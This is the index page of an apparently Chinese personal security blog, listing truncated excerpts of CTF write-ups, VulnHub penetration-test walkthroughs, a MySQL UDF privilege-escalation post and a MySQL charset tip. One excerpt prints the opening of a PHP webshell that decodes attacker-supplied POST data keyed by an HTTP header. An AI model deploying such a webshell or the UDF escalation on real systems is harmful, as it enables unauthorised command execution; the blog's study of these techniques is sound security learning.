MoR03r MoR03r's Blog
2019强网杯部分题目记录
发表于 2019-5-27 | CTF
Web 0x01 UPLOAD 刚开始没发现有www.tar.gz这个文件,队友提醒以后才下载到,但是看了半天,就知道是反序列话可以执行某些功能函数,实在无招,变开始遍历端口,结果发现了别的队伍大佬上传的shell,连上去看日志,发现了报...

阅读全文>>

VulnHub渗透测试JIS-CTF:VulnUpload
发表于 2019-3-17 | Vulnhub
VulnHub渗透测试JIS-CTF:VulnUpload 靶机 https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/ 运行环境 VM Workstation VM Esxi VirtualBox IP说明 VM IP ...

阅读全文>>

VulnHub渗透测试CasinoRoyale
发表于 2019-3-15 | Vulnhub
VulnHub渗透测试CasinoRoyale 靶机 https://www.vulnhub.com/entry/fourandsix-201,266/ 运行环境 VM Workstation VM Esxi VirtualBox 说明 获取root权限并且读取/root/flag.txt 设置 将下载好的ova文件直接导入虚拟...

阅读全文>>

VulnHub渗透测试Unknowndevice64
发表于 2019-3-15 | Vulnhub
VulnHub渗透测试Unknowndevice64 测试环境 攻击IP 说明 靶机IP 172.17.135.79 pc 172.17.135.64 172.17.135.75 VM-kali 172.1...

阅读全文>>

查看mysql数据库及表编码格式
发表于 2019-3-11 | 综合
查看mysql数据库及表编码格式 1.查看数据库编码格式 mysql> show variables like 'character_set_database' 2.查看数据表的编码格式 mysql> show create table <表名>; 3.创建数据库时指定数据库的字符集 mysql>create database ...

阅读全文>>

一次pyc文件恢复
发表于 2019-2-16 | CTF
一次pyc文件恢复 Python Pyc的文件格式 [compile.h] /* Bytecode object */ typedef struct { PyObject_HEAD int co_argcount; /* #arguments, except *args */ int co_nlocals; /* #local variables */ int co_stacksize;...

阅读全文>>

VulnHub渗透测试FourAndSix2
发表于 2018-12-12 | Vulnhub
VulnHub渗透测试FourAndSix2 靶机 https://www.vulnhub.com/entry/fourandsix-201,266/ 运行环境 VM Workstation VM Esxi VirtualBox 说明 获取root权限并且读取/root/flag.txt 设置 将下载好的ova文件直接导入虚拟...

阅读全文>>

Mysql udf提权
发表于 2018-12-2 | exploit
UDF是MySQL的一个共享库,通过udf创建能够执行系统命令的函数sys_exec、sys_eval,使得入侵者能够获得一般情况下无法获得的shell执行权限 网上有些文章利用的是sqlmap-master\udf\mysql\linux\64的libmysqludf_sys.so文件,但是测试中发现会报...

阅读全文>>

湖湘杯Common Crypto
发表于 2018-11-21 | CTF
扔入IDA进行分析: 获得关键字符串8aeb45c62003ba52e46c9600b3699b8c30386334623434393136633963356136 继续分析程序逻辑,从sbox可以发现这个程序其实是一个AES加密拼接字符串,刚才这段是密文和字符串拼接体,只需要找到密钥就能...

阅读全文>>

发现一个小马的利用方式
发表于 2018-10-25 | 综合
先贴代码吧 <?php $k = @$_SERVER["HTTP_DNT"]; $d = $p = ''; foreach ($_POST as $a => $b) $d.= $b; $t = eccode($d, 'DECODE', $k); $t = gzuncompress($t); $p = unserialize($t); $_POST = $p; $_POST['z0'] = base64_encode(preg_replace('/(\W){1}die\(\...

阅读全文>>

TOP